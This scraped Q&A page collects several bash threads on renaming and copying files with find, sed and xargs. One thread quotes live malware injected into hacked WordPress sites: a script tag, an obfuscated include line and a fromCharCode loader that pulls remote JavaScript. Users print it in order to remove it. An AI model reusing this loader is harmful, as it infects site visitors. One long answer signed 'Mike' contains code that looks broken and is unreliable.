find - grep taking too much time - bash

First of all, I'm a newbie with bash scripting, so forgive me if I'm making easy mistakes.
Here's my problem. I needed to download my company's website. I accomplished this using wget with no problems, but because some files have the ? symbol in their names and Windows doesn't allow ? in filenames, I had to create a script that renames those files and also updates the source code of all files that reference the renamed files.
To accomplish this I use the following code:
find . -type f -name '*\?*' | while read -r file ; do
    SUBSTRING=$(echo $file | rev | cut -d/ -f1 | rev)
    NEWSTRING=$(echo $SUBSTRING | sed 's/?/-/g')
    mv "$file" "${file//\?/-}"
    grep -rl "$SUBSTRING" * | xargs sed -i '' "s/$SUBSTRING/$NEWSTRING/g"
done
This has two problems:
It is taking way too long; I've waited more than 5 hours and it's still going.
It looks like it's doing an append in the source code, because when I stop the script and search for changes, the URL is repeated 4 times (or more).
Thanks all for your comments. I will try the two separate steps and see. Also, just as an FYI, there are 3291 files that were downloaded with wget. Do you still think bash scripting is preferable to other tools for this?

Seems odd that a file would have ? in it. Website URLs use ? to indicate the passing of parameters. wget from a website also doesn't guarantee you're getting the site, especially if server-side execution takes place, as with PHP files. So I suspect that as wget does its recursion, it's finding URLs that pass parameters and thus creating those files for you.
To really get the site, you should have direct access to the files.
If I were you, I'd start over and not use wget.
You may also be having issues with files or directories with spaces in their name.
Instead of that line with xargs: you're already processing one file at a time, but grepping the whole tree recursively on every iteration. Just run the sed on the renamed file itself.
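A minimal sketch of that suggestion (untested; assumes GNU sed - with BSD/macOS sed use sed -i '' as in the question):
find . -type f -name '*\?*' | while read -r file ; do
    SUBSTRING=$(basename "$file")
    NEWSTRING=${SUBSTRING//\?/-}
    mv "$file" "${file//\?/-}"
    # run sed only on the file that was just renamed, not on the whole tree
    # note: sed metacharacters other than ? in $SUBSTRING (like .) are not escaped here
    sed -i "s/$SUBSTRING/$NEWSTRING/g" "${file//\?/-}"
done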

Ok, here's the idea (untested):
in the first loop, just move the files and compose a global sed replacement file
once that is done, scan all the files and apply sed with all the patterns at once, thus saving a lot of read/write operations, which are likely the cause of the performance issue here
I would avoid putting the current script in the current directory or it will be processed by sed, so I suppose that all files to be processed are not in the current dir but in a data directory
code:
sedfile=/tmp/tmp.sed
data=data
rm -f $sedfile
# locate ourselves in the subdir to preserve the naming logic
cd $data
# rename the files and compose the big sedfile
find . -type f -name '*\?*' | while read -r file ; do
    SUBSTRING=$(echo "$file" | rev | cut -d/ -f1 | rev)
    NEWSTRING=$(echo "$SUBSTRING" | sed 's/?/-/g')
    mv "$file" "${file//\?/-}"
    echo "s/$SUBSTRING/$NEWSTRING/g" >> $sedfile
done
# now apply the big sedfile once on all the files:
# if you need to go recursive (-print0/-0 keeps names with spaces safe):
find . -type f -print0 | xargs -0 sed -i -f $sedfile
# if you don't:
sed -i -f $sedfile *
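A caveat I'd add (my note, not from the original answer, untested): if the old names can contain characters that are special to sed patterns (., *, [ and so on), escape them when composing the sedfile, e.g. by replacing the echo line with:
# escape sed BRE metacharacters in the old name before writing the rule
SAFE_OLD=$(printf '%s' "$SUBSTRING" | sed 's/[][\.*^$/]/\\&/g')
echo "s/$SAFE_OLD/$NEWSTRING/g" >> $sedfile
# (& and \ in $NEWSTRING would need similar escaping on the replacement side)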

Instead of using grep, you can use the find command or ls command to list the files and then operate directly on them.
For example, you could do:
ls -1 /path/to/files/* | xargs sed -i '' "s/$SUBSTRING/$NEWSTRING/g"
Here's where I got the idea based on another question where grep took too long:
Linux - How to find files changed in last 12 hours without find command
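As an aside (my note, untested): if the directory might hold odd filenames, a find-based variant avoids parsing the output of ls:
find /path/to/files -maxdepth 1 -type f -print0 | xargs -0 sed -i '' "s/$SUBSTRING/$NEWSTRING/g"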

Related

Copy files matching both sub directories and file names from strings in file

I want to copy files from multiple sub directories to a new directory within the main directory called copiedFiles/. I only want to copy files that can be matched to strings in the file strs2bMatchd.csv. The names of the sub directories also match the first part of the strings to be matched (see example below).
The main directory with sub directories looks like this:
main_dir/
    strs2bMatchd.csv
    1111/
        1111_aaa1_x873.csv
        1111_aaa2_x874.csv
        1111_ddd1_x443.csv
        1111_ddd2_x444.csv
    1112/
        1112_bbb1_x912.csv
        1112_bbb2_x913.csv
        1112_fff1_x664.csv
        1112_fff2_x665.csv
    1113/
        1113_ccc1_x912.csv
        1113_ccc2_x913.csv
The files to be copied should match the strings in the strs2bMatchd.csv file
cat strs2bMatchd.csv
1111_aaa1
1111_aaa2
1112_bbb1
1112_bbb2
1113_ccc1
1113_ccc2
This is the expected result:
main_dir/
    strs2bMatchd.csv
    1111/
        1111_aaa1_x873.csv
        1111_aaa2_x874.csv
        1111_ddd1_x443.csv
        1111_ddd2_x444.csv
    1112/
        1112_bbb1_x912.csv
        1112_bbb2_x913.csv
        1112_fff1_x664.csv
        1112_fff2_x665.csv
    1113/
        1113_ccc1_x912.csv
        1113_ccc2_x913.csv
    copiedFiles/
        1111_aaa1_x873.csv
        1111_aaa2_x874.csv
        1112_bbb1_x912.csv
        1112_bbb2_x913.csv
        1113_ccc1_x912.csv
        1113_ccc2_x913.csv
As an alternative, consider
M=main_dir
mkdir -p $M/copiedFiles
find $M | grep -F -v "$M/copiedFiles" | grep -Ff $M/strs2bMatchd.csv | xargs cp -t $M/copiedFiles/
It will execute the find once.
If the files may contain spaces or other special characters, consider using the safe version (NUL-terminated strings): -print0 for find, -z for grep, and -0 for xargs.
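A sketch of that NUL-safe variant (untested; assumes GNU grep, whose -z option treats input and output lines as NUL-terminated):
find $M -print0 | grep -zF -v "$M/copiedFiles" | grep -zFf $M/strs2bMatchd.csv | xargs -0 cp -t $M/copiedFiles/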
Update 1: The OP indicates his version of cp does not have -t. An alternative solution without this option is posted below.
I cannot test it; please try to resolve any problems using the man pages, etc.
M=main_dir
mkdir -p $M/copiedFiles
find $M | grep -F -v "$M/copiedFiles" | grep -Ff $M/strs2bMatchd.csv | xargs -I{} cp {} $M/copiedFiles/

How to replace whole string using sed or possibly grep

So my whole server got hacked, or has a malware problem. My site is based on WordPress, and the majority of sites hosted on my server are WordPress based. The hacker added this line of code to every single file and to the database:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string on a single file index.php first, so I know it works.
and I know my code is wrong. Please help me with this.
I tried @Eran's code and it deleted the whole line, which is good and as expected. However, the leftover junk is this:
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
Though @slybloty's solution is easy and it worked.
So, to remove the code fully from all the affected files, I'm running the following 3 commands. Thanks to all of you for this.
To remove the script line:
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"
To remove the #include line:
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d'
To remove the comment line:
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d'
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html files in all the directories. I was not sure if deleting these index.html files in bulk was the right approach.
Now, I still need to figure out the junk files and the traces of it.
The hacker's script added this JS code as well:
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - search for files
-type f - only regular files
-name '*.php' - whose names end with .php
-print0 - print them separated by zero bytes
| xargs -0 - for each file separated by a zero byte
-P7 - run 7 processes concurrently
-n1 - pass one file per sed invocation
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run, from the other answers.
You may want to add the -t option to xargs to see the progress. See man find and man xargs (http://man7.org/linux/man-pages/man1/xargs.1.html).
Single quotes are taken literally without escape characters.
In var='hello\'', you have an unclosed quote.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed can use any delimiter in the s command. Since you have slashes in the pattern, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This trick works in bash and other POSIX shells.
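A tiny demonstration of the '\'' trick (my example):
echo 'don'\''t' # prints: don't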
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
Edit: Please see @EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why the OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. The GNU version of sed should have this. I'm also making the assumption that this code always appears in this format, 6 lines long.
while read -r filename; do
    # .bak is optional here if you want to back up any files that are edited
    sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g' "$filename"
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything up to and including the next line feed, avoiding greedy regex matching. Because we aren't splitting on line feeds (-z), a pattern such as var pl = String\.fromCharCode(104,116,116,112,115.*\n}\n would make the largest possible match: if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Repeating the [^\n]*\n sequence 6 times instead matches exactly to the end of the first line and the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that contain the matching pattern. This way, sed isn't editing every file, and -i.bak (as opposed to plain -i) doesn't leave a .bak copy of every file in the tree.
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today; all page posts got this nasty virus script added:
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I disabled it in the database with:
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
I do not have infected files, at least:
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not find a thing, but I have no idea how this got into the database, which I am not at all calm about.
This infection caused redirects on pages; Chrome mostly detects and blocks this. I did not notice anything strange in /wp-mail-smtp/src/Debug.php.
For me, this worked:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search for: *.js, *.json, *.map
I've got the same thing today; all page posts got the script added.
I've dealt with them successfully by using the Search and Replace plugin.
Moreover, I've also found one record in the wp_posts table, post_content column, containing the following string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

Can I convert between UpperCamelCase, lowerCamelCase and dash-case in filenames with Bash? [duplicate]

This question already has answers here:
linux bash, camel case string to separate by dash
(9 answers)
Closed 6 years ago.
I am in the process of merging efforts with another developer. I am using UpperCamelCase, but we decided to follow Google's HTML style guide, using lower case and separating words with hyphens. This decision requires me to rename quite a few files on my filesystem. I first thought this would be easy, since I often use bash for renaming large collections of files. Unfortunately, renaming based on casing style appeared to be a bit more complicated, and I did not manage to find an approach.
Can I convert files from one naming convention to another with Bash?
Can I convert files from one naming convention to another with Bash?
Try using the rename command with the -f option to rename files with the desired substitutions. (This is the Perl-based rename, which accepts s/// expressions; the util-linux rename uses a different syntax.)
rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/' <list_of_files>
If you also want to select <list_of_files> with some pattern, let's say extension .ext, you need to combine find with the above command using xargs:
find -type f -name "*.ext" -print0 | xargs -0 rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/'
For example if you want to rename all files in pwd
$ ls
dash-case
lowerCamelCase
UpperCamelCase
$ rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/' *
$ ls
dash-case
lower-camel-case
upper-camel-case
Try this:
for FILE in *; do NEWFILE=$( (sed -re 's/\B([A-Z])/-\1/g' | tr '[:upper:]' '[:lower:]') <<< "$FILE"); if [ "$NEWFILE" != "$FILE" ]; then echo mv \""$FILE"\" \""$NEWFILE"\"; fi; done
This should give you a list of "mv" statements on standard output. Double-check that they look right, then just add | bash to the end of the statement to run them all.
How does it work?
for FILE in *; do
    NEWFILE=$( (sed -re 's/\B([A-Z])/-\1/g' | tr '[:upper:]' '[:lower:]') <<< "$FILE")
    if [ "$NEWFILE" != "$FILE" ]; then
        echo mv \""$FILE"\" \""$NEWFILE"\"
    fi
done
The for FILE in * loops across all files in the current directory, acknowledging that there are a wide variety of ways to loop through all files. The sed statement matches only uppercase letters that, according to \B, aren't on a word boundary (i.e. at the beginning of the string). Because of this selective match, it makes the most sense to switch everything to lowercase in a separate call to tr. Finally, the condition ensures that you only see the filenames that change, and the trick of using echo ensures that you don't make changes to your filesystem without seeing them first.
I ran into a similar question and based on one answer there I came to the following solution. It is not a full Bash solution, since it relies on perl, but since it does the trick I am sharing it.
ls | for file in `xargs`; do mv "$file" "`echo $file | perl -ne 'print lc(join("-", split(/(?=[A-Z])/)))'`"; done
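A more quote-safe variant of the same idea (my sketch, untested; it uses a lowercase-and-hyphenate regex instead of the split approach):
for file in *; do
    # insert a hyphen before each inner capital, then lowercase everything
    mv -- "$file" "$(printf '%s' "$file" | perl -pe 's/([a-z0-9])([A-Z])/$1-$2/g; $_ = lc')"
done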

Bash Script - Copy latest version of a file in a directory recursively

Below, I am trying to find the latest version of a file that could be in multiple directories.
Example Directory:
~inventory/emails/2012/06/InventoryFeed-Activev2.csv 2012/06/05
~inventory/emails/2012/06/InventoryFeed-Activev1.csv 2012/06/03
~inventory/emails/2012/06/InventoryFeed-Activev.csv 2012/06/01
Here's the bash script:
#!/bin/bash
FILE = $(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
#echo $FILE #For Testing
cp $FILE ~/inventory/Feed-active.csv;
The error I am getting is:
./inventory.sh: line 5: FILE: command not found
The script should copy the newest file as attempted above.
Two questions:
First, is this the best method to achieve what I want?
Second, what's wrong above?
It looks good, but you have spaces around the = sign. This won't work. Try:
#!/bin/bash
FILE=$(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
#echo $FILE #For Testing
cp $FILE ~/inventory/Feed-active.csv;
... What's wrong above?
Variable assignment. You are not supposed to put extra spaces around = sign. The following should work:
FILE=$(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
... is this the best method to achieve what I want?
Probably not. But the best way depends on many factors. Perhaps whoever writes those files can put them in the right location in the first place. You could also check the file modification time, but that could fail too... So as long as it works for you, I'd say go for it :)
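If you did want to pick the newest file by modification time rather than by name, here is a sketch (untested; assumes GNU find, which has -printf):
find ~/inventory/emails/ -name 'INVENTORYFEED-Active*.csv' -printf '%T@ %p\n' | sort -n | tail -1 | cut -d' ' -f2-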

Commandline find, sed, exec

I have a bunch of files in a folder and its subfolders, and I'm trying to make some kind of one-liner for quick copy/pasting once in a while.
The contents are (too long to paste here): http://pastebin.com/4aZCPbwT
I've tried the following commands:
List all files and their directories
find . -name '[!.]*'
Replace all instances of "Namespace" with "Test":
find . -name '[!.]*' -print0 | sed 's/Namespace/Test/gI' | xargs -i -0 echo '{}'
What I need to do is:
Replace folder names as above, and copy the folders (including files) to another location. Create the folders if they don't exist (they most likely won't) - BUT, there are some that I don't need, like ./app, as this folder already exists. I could use -wholename './app' for that.
When they are copied, I need to replace some text inside each file, same as above (Namespace with Test - it also occurs inside the files), and save them of course.
Something like this I would imagine:
-print -exec sed -i 's/Namespace/Test/gI' {} \;
Can these 3 things be done in a one-liner? Replace text in files (Namespace <=> Test), copy files including their directories with cp -p (I don't want to overwrite folders), and rename each directory/file as above (Namespace <=> Test).
Thanks a lot :-)
Besides describing the how with painstaking verbosity below, this method may also be unique in that it incorporates built-in debugging. It basically doesn't do anything at all as written except compile and save to a variable all commands it believes it should do in order to perform the work requested.
It also explicitly avoids loops as much as possible. Besides sed's recursive search for more than one match of the pattern, there is no other recursion as far as I know.
And last, this is entirely null delimited - it doesn't trip on any character in any filename except the null, and I don't think you should have that in a filename.
By the way, this is REALLY fast. Look:
% _mvnfind() { mv -n "${1}" "${2}" && cd "${2}"
> read -r SED <<SED
> :;s|${3}\(.*/[^/]*${5}\)|${4}\1|;t;:;s|\(${5}.*\)${3}|\1${4}|;t;s|^[0-9]*\(.*\)${5}|\1|p
> SED
> find . -name "*${3}*" -printf "%d\tmv %P ${5} %P\000" |
> sort -zg | sed -nz ${SED} | read -r ${6}
> echo <<EOF
> Prepared commands saved in variable: ${6}
> To view do: printf ${6} | tr "\000" "\n"
> To run do: sh <<EORUN
> $(printf ${6} | tr "\000" "\n")
> EORUN
> EOF
> }
% rm -rf "${UNNECESSARY:=/any/dirs/you/dont/want/moved}"
% time ( _mvnfind ${SRC=./test_tree} ${TGT=./mv_tree} \
> ${OLD=google} ${NEW=replacement_word} ${sed_sep=SsEeDd} \
> ${sh_io:=sh_io} ; printf %b\\000 "${sh_io}" | tr "\000" "\n" \
> | wc - ; echo ${sh_io} | tr "\000" "\n" | tail -n 2 )
<actual process time used:>
0.06s user 0.03s system 106% cpu 0.090 total
<output from wc:>
Lines Words Bytes
115 362 20691 -
<output from tail:>
mv .config/replacement_word-chrome-beta/Default/.../googlestars \
.config/replacement_word-chrome-beta/Default/.../replacement_wordstars
NOTE: The above function will likely require GNU versions of sed and find to properly handle the find -printf and the sed -z and :;recursive regex test;t calls. If these are not available to you, the functionality can likely be duplicated with a few minor adjustments.
This should do everything you wanted from start to finish with very little fuss. I did fork with sed, but I was also practicing some sed recursive branching techniques so that's why I'm here. It's kind of like getting a discount haircut at a barber school, I guess. Here's the workflow:
rm -rf ${UNNECESSARY}
I intentionally left out any functional call that might delete or destroy data of any kind. You mention that ./app might be unwanted. Delete it or move it elsewhere beforehand, or, alternatively, you could build in a \( -path PATTERN -exec rm -rf \{\} \) routine to find to do it programmatically, but that one's all yours.
_mvnfind "${#}"
Declare its arguments and call the worker function. ${sh_io} is especially important in that it saves the return from the function. ${sed_sep} comes in a close second; this is an arbitrary string used to reference sed's recursion in the function. If ${sed_sep} is set to a value that could potentially be found in any of your path- or file-names acted upon... well, just don't let it be.
mv -n $1 $2
The whole tree is moved from the beginning. It will save a lot of headache; believe me. The rest of what you want to do - the renaming - is simply a matter of filesystem metadata. If you were, for instance, moving this from one drive to another, or across filesystem boundaries of any kind, you're better off doing so at once with one command. It's also safer. Note the -n (no-clobber) option set for mv; as written, this function will not put ${SRC_DIR} where a ${TGT_DIR} already exists.
read -r SED <<HEREDOC
I located all of sed's commands here to save on escaping hassles and read them into a variable to feed to sed below. Explanation below.
find . -name ${OLD} -printf
We begin the find process. With find we search only for anything that needs renaming because we already did all of the place-to-place mv operations with the function's first command. Rather than take any direct action with find, like an exec call, for instance, we instead use it to build out the command-line dynamically with -printf.
%dir-depth :tab: 'mv '%path-to-${SRC}' '${sed_sep}'%path-again :null delimiter:'
After find locates the files we need it directly builds and prints out (most) of the command we'll need to process your renaming. The %dir-depth tacked onto the beginning of each line will help to ensure we're not trying to rename a file or directory in the tree with a parent object that has yet to be renamed. find uses all sorts of optimization techniques to walk your filesystem tree and it is not a sure thing that it will return the data we need in a safe-for-operations order. This is why we next...
sort -general-numerical -zero-delimited
We sort all of find's output based on %directory-depth so that the paths nearest in relationship to ${SRC} are worked first. This avoids possible errors involving mving files into non-existent locations, and it minimizes the need for recursive looping. (in fact, you might be hard-pressed to find a loop at all)
sed -ex :rcrs;srch|(save${sep}*til)${OLD}|\saved${SUBSTNEW}|;til ${OLD=0}
I think this is the only loop in the whole script, and it only loops over the second %Path printed for each string in case it contains more than one ${OLD} value that might need replacing. All other solutions I imagined involved a second sed process, and while a short loop may not be desirable, certainly it beats spawning and forking an entire process.
So basically what sed does here is search for ${sed_sep}, then, having found it, saves it and all characters it encounters until it finds ${OLD}, which it then replaces with ${NEW}. It then heads back to ${sed_sep} and looks again for ${OLD}, in case it occurs more than once in the string. If it is not found, it prints the modified string to stdout (which it then catches again next) and ends the loop.
This avoids having to parse the entire string, and ensures that the first half of the mv command string, which needs to include ${OLD} of course, does include it, and the second half is altered as many times as is necessary to wipe the ${OLD} name from mv's destination path.
sed -ex...-ex search|%dir_depth(save*)${sed_sep}|(only_saved)|out
The two -exec calls here happen without a second fork. In the first, as we've seen, we modify the mv command as supplied by find's -printf function command as necessary to properly alter all references of ${OLD} to ${NEW}, but in order to do so we had to use some arbitrary reference points which should not be included in the final output. So once sed finishes all it needs to do, we instruct it to wipe out its reference points from the hold-buffer before passing it along.
AND NOW WE'RE BACK AROUND
read will receive a command that looks like this:
% mv /path2/$SRC/$OLD_DIR/$OLD_FILE /same/path_w/$NEW_DIR/$NEW_FILE \000
It will read it into ${msg} as ${sh_io} which can be examined at will outside of the function.
Cool.
-Mike
I haven't tested this, but I think it's what you're after.
find . -name '[!.]*' -print | while IFS= read -r line; do nfile=$(echo "$line" | sed 's/Namespace/Test/gI'); mkdir -p "$(dirname "$nfile")"; cp -p "$line" "$nfile"; sed -i 's/Namespace/Test/gI' "$nfile"; done
